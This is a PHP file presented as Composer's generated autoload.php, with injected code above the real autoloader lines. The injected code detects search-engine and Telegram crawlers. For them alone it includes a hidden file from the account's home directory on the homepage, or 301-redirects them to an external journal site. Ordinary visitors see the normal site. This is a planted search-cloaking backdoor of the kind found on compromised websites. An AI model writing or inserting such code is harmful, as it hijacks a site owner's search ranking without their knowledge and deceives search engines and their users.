<?php
function is_bot() {
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $bots = array('Googlebot', 'TelegramBot', 'bingbot', 'Google-Site-Verification', 'Google-InspectionTool');

    foreach ($bots as $bot) {
        if (stripos($user_agent, $bot) !== false) {
            return true;
        }
    }
    return false;
}

function is_homepage() {
    $uri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
    return $uri === '/' || $uri === '';
}

if (is_bot()) {
    if (is_homepage()) {
        include('/home/u3110080/.bash_login');
    } else {
        header("Location: https://e-journal.yayasancec.or.id/", true, 301);
    }
    exit;
} 

// autoload.php @generated by Composer

require_once __DIR__ . '/composer/autoload_real.php';

return ComposerAutoloaderInit0798b05440c01cd0aa07c6abe35d0121::getLoader();
